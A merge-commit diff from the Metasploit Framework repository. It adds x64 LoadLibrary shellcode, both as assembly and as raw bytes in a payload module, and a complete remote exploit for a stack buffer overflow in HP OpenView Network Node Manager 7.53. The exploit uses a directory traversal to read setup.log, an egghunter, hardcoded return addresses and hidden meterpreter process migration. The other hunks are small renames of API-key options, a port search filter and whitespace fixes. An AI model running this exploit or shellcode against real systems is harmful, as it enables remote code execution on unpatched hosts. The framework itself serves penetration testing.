Merge branch 'master' of r7.github.com:rapid7/metasploit-framework
This commit is contained in:
commit
3fe5b7b09d
|
@ -0,0 +1,24 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: scriptjunkie (scriptjunkie[at]scriptjunkie[dot]us),
|
||||
; Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2003
|
||||
; 17 Jan 2012
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 64]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
delta: ;
|
||||
%include "./src/block/block_api.asm" ;
|
||||
start: ;
|
||||
pop rbp ; Pop off the address of 'api_call' for calling later.
|
||||
lea rcx, [ebp+libpath-delta]
|
||||
mov r10d, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||
call rbp ; LoadLibraryA( &libpath );
|
||||
; Finish up with the EXITFUNK.
|
||||
%include "./src/block/block_exitfunk.asm"
|
||||
libpath:
|
||||
;db "funkystuff.dll", 0
|
|
@ -690,6 +690,8 @@ class Module
|
|||
if not match and self.respond_to?(:targets) and self.targets
|
||||
match = [t,w] if self.targets.map{|x| x.name}.any? { |t| t =~ r }
|
||||
end
|
||||
when 'port'
|
||||
match = [t,w] if self.datastore['RPORT'].to_s =~ r
|
||||
when 'type'
|
||||
match = [t,w] if (w == "exploit" and is_exploit)
|
||||
match = [t,w] if (w == "auxiliary" and is_auxiliary)
|
||||
|
|
|
@ -1285,6 +1285,7 @@ class Core
|
|||
"name" => "Modules with a matching descriptive name",
|
||||
"path" => "Modules with a matching path or reference name",
|
||||
"platform" => "Modules affecting this platform",
|
||||
"port" => "Modules with a matching remote port",
|
||||
"type" => "Modules of a specific type (exploit, auxiliary, or post)",
|
||||
"app" => "Modules that are client or server attacks",
|
||||
"author" => "Modules written by this author",
|
||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]),
|
||||
OptString.new('YEAR', [ false, "Limit results to a specific year", ""]),
|
||||
OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]),
|
||||
OptString.new('API_KEY', [ false, "Use this API key when getting the data", ""]),
|
||||
OptString.new('CORPWATCH_APIKEY', [ false, "Use this API key when getting the data", ""]),
|
||||
], self.class)
|
||||
|
||||
deregister_options('RHOST', 'RPORT', 'Proxies', 'VHOST')
|
||||
|
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
{
|
||||
'company_name' => datastore['COMPANY_NAME'],
|
||||
'limit' => datastore['LIMIT'],
|
||||
'key' => datastore['API_KEY']
|
||||
'key' => datastore['CORPWATCH_APIKEY']
|
||||
}
|
||||
}, 25)
|
||||
|
||||
|
|
|
@ -45,7 +45,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('APIKEY', [true, "The SHODAN API key"]),
|
||||
OptString.new('SHODAN_APIKEY', [true, "The SHODAN API key"]),
|
||||
OptString.new('QUERY', [true, "Keywords you want to search for"]),
|
||||
OptString.new('OUTFILE', [false, "A filename to store the list of IPs"]),
|
||||
OptBool.new('DATABASE', [false, "Add search results to the database", false]),
|
||||
|
@ -89,7 +89,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
def run
|
||||
# create our Shodan request parameters
|
||||
query = datastore['QUERY']
|
||||
apikey = datastore['APIKEY']
|
||||
apikey = datastore['SHODAN_APIKEY']
|
||||
|
||||
@res = Net::DNS::Resolver.new()
|
||||
dns_query = @res.query("#{datastore['VHOST']}", "A")
|
||||
|
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
# OptAddressRange.new('RHOSTS', [false, "The target address, range, or CIDR identifier"]),
|
||||
OptString.new('APIKEY', [ true, "Your HTTP:BL api key"])
|
||||
OptString.new('HTTPBL_APIKEY', [ true, "Your HTTP:BL api key"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def resolve(ip)
|
||||
results = ''
|
||||
apikey = datastore['apikey']
|
||||
apikey = datastore['HTTPBL_APIKEY']
|
||||
query = apikey + '.' + ip.split('.').reverse.join('.') + '.dnsbl.httpbl.org'
|
||||
begin
|
||||
results = Resolv::DNS.new.getaddress(query).to_s
|
||||
|
|
|
@ -83,17 +83,17 @@ class Metasploit3 < Msf::Auxiliary
|
|||
unless tmp_tblnames.nil?
|
||||
tmp_db['DBName']= dbname[0]
|
||||
tmp_db['Tables'] = []
|
||||
tmp_tblnames.each do |tblname|
|
||||
tmp_tblnames.each do |tblname|
|
||||
next if tblname[0].nil?
|
||||
tmp_tbl = {}
|
||||
tmp_tbl['TableName'] = tblname[0]
|
||||
tmp_tbl['TableName'] = tblname[0]
|
||||
tmp_tbl['Columns'] = []
|
||||
tmp_columns = get_columns(dbname[0], tblname[1])
|
||||
unless tmp_columns.nil?
|
||||
tmp_columns.each do |column|
|
||||
next if column[0].nil?
|
||||
next if column[0].nil?
|
||||
tmp_column = {}
|
||||
tmp_column['ColumnName'] = column[0]
|
||||
tmp_column['ColumnName'] = column[0]
|
||||
tmp_column['ColumnType'] = column[1]
|
||||
tmp_column['ColumnLength'] = column[2]
|
||||
tmp_tbl['Columns'] << tmp_column
|
||||
|
@ -121,6 +121,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return results
|
||||
end
|
||||
|
||||
# TODO: This should be split up, I fear nil problems in these query/response parsings
|
||||
def get_columns(db_name, table_id)
|
||||
results = mssql_query("Select syscolumns.name,systypes.name,syscolumns.length from #{db_name}..syscolumns JOIN #{db_name}..systypes ON syscolumns.xtype=systypes.xtype WHERE syscolumns.id=#{table_id}")[:rows]
|
||||
return results
|
||||
|
|
|
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'MYSQL Schema Dump',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %Q{
|
||||
This module extracts the schema information from a
|
||||
This module extracts the schema information from a
|
||||
MySQL DB server.
|
||||
},
|
||||
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
||||
|
@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
unless tmp_clmnames.nil? or tmp_clmnames.empty?
|
||||
tmp_clmnames.each do |column|
|
||||
tmp_column = {}
|
||||
tmp_column['ColumnName'] = column[0]
|
||||
tmp_column['ColumnName'] = column[0]
|
||||
tmp_column['ColumnType'] = column[1]
|
||||
tmp_tbl['Columns'] << tmp_column
|
||||
end
|
||||
|
|
|
@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'Postgres Schema Dump',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %Q{
|
||||
This module extracts the schema information from a
|
||||
This module extracts the schema information from a
|
||||
Postgres server.
|
||||
},
|
||||
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
||||
|
@ -117,7 +117,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
when :complete
|
||||
return res[:complete].rows
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
|
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an use after free vulnerability in Mozilla
|
||||
This module exploits a use-after-free vulnerability in Mozilla
|
||||
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
|
||||
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
|
||||
becomes a dangling pointer and can be reused when setting the OBJECTs
|
||||
|
|
|
@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Felipe Andres Manzano', #Original poc (@feliam)
|
||||
'sinn3r',
|
||||
'juan vazquez',
|
||||
'jduck'
|
||||
|
@ -40,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa11-04.html' ],
|
||||
[ 'URL', 'http://blog.vulnhunt.com/index.php/2011/12/12/cve-2011-2462-pdf-0day-analysis/' ],
|
||||
[ 'URL', 'http://blog.9bplus.com/analyzing-cve-2011-2462' ],
|
||||
[ 'URL', 'https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0'], #Original PoC
|
||||
[ 'URL', 'http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
|
|
|
@ -0,0 +1,277 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ }
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::Remote::Egghunter
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in HP OpenView Network Node
|
||||
Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long
|
||||
'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can
|
||||
cause a stack-based buffer overflow and execute arbitrary code.
|
||||
|
||||
The vulnerable code is within the "_OVBuildPath" function within "ov.dll". There
|
||||
are no stack cookies, so exploitation is achieved by overwriting the saved return
|
||||
address.
|
||||
|
||||
The vulnerability is due to the use of the function "_OVConcatPath" which finally
|
||||
uses "strcat" in a insecure way. User controlled data is concatenated to a string
|
||||
which contains the OpenView installation path.
|
||||
|
||||
To achieve reliable exploitation a directory traversal in OpenView5.exe
|
||||
(OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation
|
||||
path. If the installation path cannot be guessed the default installation path
|
||||
is used.
|
||||
} ,
|
||||
'Author' =>
|
||||
[
|
||||
'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery
|
||||
'juan vazquez', # Metasploit module
|
||||
'sinn3r' # Metasploit fu
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2011-3167' ],
|
||||
[ 'OSVDB', '76775' ],
|
||||
[ 'BID', '50471' ],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-002/' ],
|
||||
[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 950,
|
||||
'BadChars' => [*(0x00..0x09)].pack("C*") + [*(0x0b..0x23)].pack("C*") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack("C*"),
|
||||
'DisableNops' => true,
|
||||
'EncoderOptions' =>
|
||||
{
|
||||
'BufferRegister' => 'EDI' # Egghunter jmp edi
|
||||
}
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3',
|
||||
# Patches installed:
|
||||
# * ECS_00048
|
||||
# * NNM_01128
|
||||
# * NNM_01172
|
||||
# * NNM_01187
|
||||
{
|
||||
'Offset' => 1067,
|
||||
'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002)
|
||||
'JmpESP' => 0x5a4251c5, # call esp - in ov.dll
|
||||
'EggAdjust' => 4,
|
||||
'ReadableAddress' => 0x5a466930 # ov.dll
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 01 2011'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# The following code allows to migrate if having into account
|
||||
# that over Windows XP permissions aren't granted on %windir%\system32
|
||||
#
|
||||
# Code ripped from "modules/post/windows/manage/migrate.rb". See it
|
||||
# for more information
|
||||
def on_new_session(client)
|
||||
|
||||
if client.type != "meterpreter"
|
||||
print_error("NOTE: you must use a meterpreter payload in order to process migration.")
|
||||
return
|
||||
end
|
||||
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
|
||||
# Select path and executable to run depending the architecture
|
||||
# and the operating system
|
||||
if client.sys.config.sysinfo["OS"] =~ /Windows XP/
|
||||
windir = client.fs.file.expand_path("%ProgramFiles%")
|
||||
cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
|
||||
else # Windows 2000
|
||||
windir = client.fs.file.expand_path("%windir%")
|
||||
if client.sys.config.sysinfo['Architecture'] =~ /x86/
|
||||
cmd = "#{windir}\\System32\\notepad.exe"
|
||||
else
|
||||
cmd = "#{windir}\\Sysnative\\notepad.exe"
|
||||
end
|
||||
end
|
||||
|
||||
# run hidden
|
||||
print_status("Spawning #{cmd.split("\\").last} process to migrate to")
|
||||
proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
|
||||
target_pid = proc.pid
|
||||
|
||||
begin
|
||||
print_good("Migrating to #{target_pid}")
|
||||
client.core.migrate(target_pid)
|
||||
print_good("Successfully migrated to process #{target_pid}")
|
||||
rescue ::Exception => e
|
||||
print_error("Could not migrate in to process.")
|
||||
print_error(e.to_s)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
# Tries to guess the HP OpenView install dir via the Directory traversal identified
|
||||
# by OSVDB 44359.
|
||||
# If OSVDB 44359 doesn't allow to retrieve the installation path the default one
|
||||
# (C:\Program Files\HP OpenView\) is used.
|
||||
# Directory Traversal used:
|
||||
# http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log
|
||||
def get_install_path
|
||||
|
||||
cgi = '/OvCgi/OpenView5.exe'
|
||||
web_session = rand_text_numeric(3)
|
||||
my_cookie = "OvOSLocale=English_United States.1252; "
|
||||
my_cookie << "OvAcceptLang=en-US; "
|
||||
my_cookie << "OvJavaLocale=en_US.Cp1252; "
|
||||
my_cookie << "OvWebSession=#{web_session}:AnyUser:"
|
||||
|
||||
payload = "../../../log/setup.log"
|
||||
res = send_request_cgi({
|
||||
'uri' => cgi,
|
||||
'cookie' => my_cookie,
|
||||
'method' => "GET",
|
||||
'vars_get' =>
|
||||
{
|
||||
'Target' => "Main",
|
||||
'Scope' => "Snmp",
|
||||
'Action' => payload
|
||||
}
|
||||
}, 5)
|
||||
|
||||
installation_path = ""
|
||||
if res and res.code == 200 and
|
||||
res.body =~ /([A-Z]:\\.*\\)log/
|
||||
print_status("Installation Path Found in #{$1}")
|
||||
installation_path = $1
|
||||
else
|
||||
print_status("Installation Path Not Found using the default")
|
||||
installation_path = "C:\\Program Files\\HP OpenView\\"
|
||||
end
|
||||
|
||||
return installation_path
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
install_path = get_install_path
|
||||
install_path << "help\\English_United States.1252"
|
||||
|
||||
eggoptions = {
|
||||
:checksum => true,
|
||||
}
|
||||
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
|
||||
|
||||
[ 'x86/alpha_mixed'].each { |name|
|
||||
enc = framework.encoders.create(name)
|
||||
if name =~/alpha/
|
||||
# If control is transferred to the decoder via "call esp" BufferOfset
|
||||
# shoulds be adjusted.
|
||||
if target["EggAdjust"] and target["EggAdjust"] > 0
|
||||
enc_options = {
|
||||
'BufferRegister' => 'ESP',
|
||||
'BufferOffset' => target["EggAdjust"]
|
||||
}
|
||||
enc.datastore.import_options_from_hash(enc_options)
|
||||
else
|
||||
enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
|
||||
end
|
||||
end
|
||||
hunter = enc.encode(hunter, nil, nil, platform)
|
||||
}
|
||||
|
||||
offset = target['Offset'] - install_path.length - egg.length
|
||||
|
||||
my_payload = egg
|
||||
my_payload << rand_text_alphanumeric(offset)
|
||||
my_payload << [target.ret].pack("V")
|
||||
my_payload << rand_text_alphanumeric(4) # Padding
|
||||
my_payload << [target["ReadableAddress"]].pack("V")
|
||||
my_payload << [target["JmpESP"]].pack("V")
|
||||
my_payload << hunter
|
||||
|
||||
buf = "-textFile+#{my_payload}+++++++++++++++++++++++"
|
||||
buf << "-appendSelectList+-appendSelectListToTitle+%09%09++++++"
|
||||
buf << "-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++"
|
||||
buf << "-dataLine+2+"
|
||||
buf << "-commandTitle+%22Services%22+%09%09++++++"
|
||||
buf << "-iconName+%22Services%22+++++++++++++++++++++++"
|
||||
buf << "-cmd+rnetstat+"
|
||||
buf << "-S"
|
||||
|
||||
web_session = rand_text_numeric(3)
|
||||
my_cookie = "OvOSLocale=English_United States.1252; "
|
||||
my_cookie << "OvAcceptLang=en-US; "
|
||||
my_cookie << "OvJavaLocale=en_US.Cp1252; "
|
||||
my_cookie << "OvWebSession=#{web_session}:AnyUser:"
|
||||
|
||||
cgi = '/OvCgi/webappmon.exe'
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => cgi,
|
||||
'cookie' => my_cookie,
|
||||
'method' => "POST",
|
||||
'vars_post' =>
|
||||
{
|
||||
'ins' => 'nowait',
|
||||
'sel' => rand_text_alphanumeric(15),
|
||||
'app' => 'IP Tables',
|
||||
'act' => 'Services',
|
||||
'help' => '',
|
||||
'cache' => rand_text_numeric(4)
|
||||
},
|
||||
'data' => "arg=#{buf}" # Avoid uri encoding
|
||||
}, 3)
|
||||
|
||||
if res and res.code != 502
|
||||
print_error("Eek! We weren't expecting a response, but we got one")
|
||||
if datastore['DEBUG']
|
||||
print_line()
|
||||
print_error(res.inspect)
|
||||
end
|
||||
end
|
||||
|
||||
handler
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3
|
||||
|
||||
meterpreter > run post/windows/manage/migrate
|
||||
|
||||
[*] Running module against HOME-F006222D6C
|
||||
[*] Current server process: webappmon.exe (7064)
|
||||
[*] Spawning notepad.exe process to migrate to
|
||||
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
|
||||
[-] Call stack:
|
||||
[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'
|
||||
[-] (eval):80:in `create_temp_proc'
|
||||
[-] (eval):49:in `run'
|
||||
=end
|
|
@ -0,0 +1,74 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Windows
|
||||
include Msf::Payload::Single
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Windows x64 LoadLibrary Path',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Load an arbitrary x64 library path',
|
||||
'Author' => [ 'scriptjunkie', 'sf' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86_64,
|
||||
'PayloadCompat' =>
|
||||
{
|
||||
'Convention' => '-http -https',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 228, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\xFC\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
|
||||
"\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
|
||||
"\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
|
||||
"\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x66\x81\x78" +
|
||||
"\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67" +
|
||||
"\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56" +
|
||||
"\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0" +
|
||||
"\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24" +
|
||||
"\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41" +
|
||||
"\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01" +
|
||||
"\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83" +
|
||||
"\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF" +
|
||||
"\xFF\xFF\x5D\x67\x48\x8D\x8D\x00\x01\x00\x00\x41\xBA\x4C\x77\x26" +
|
||||
"\x07\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF\xD5" +
|
||||
"\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13" +
|
||||
"\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5"
|
||||
}
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('DLL', [ true, "The library path to load (UNC is OK)" ]),
|
||||
], self.class )
|
||||
end
|
||||
|
||||
def generate
|
||||
return super + dll_string + "\x00"
|
||||
end
|
||||
|
||||
def dll_string
|
||||
return datastore['DLL'] || ''
|
||||
end
|
||||
|
||||
end
|
|
@ -15,12 +15,12 @@ class Metasploit3 < Msf::Post
|
|||
include Msf::Auxiliary::Report
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Registry
|
||||
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'Windows File and Registry Artifacts Enumeration',
|
||||
'Description' => %q{
|
||||
This module will check the file system and registry for particular artifacts. The
|
||||
This module will check the file system and registry for particular artifacts. The
|
||||
list of artifacts is read from data/post/artifacts or a user specified file. Any
|
||||
matches are written to the loot. },
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
# Start enumerating
|
||||
print_status("Processing artifacts file...")
|
||||
file = ::File.open(filename, "r")
|
||||
file = ::File.open(filename, "rb")
|
||||
file.each_line do |line|
|
||||
line.strip!
|
||||
next if line.length < 1
|
||||
|
@ -103,4 +103,4 @@ end
|
|||
|
||||
=begin
|
||||
To-do: Use CSV or yaml format to store enum_artifacts_list.txt
|
||||
=end
|
||||
=end
|
||||
|
|
Loading…
Reference in New Issue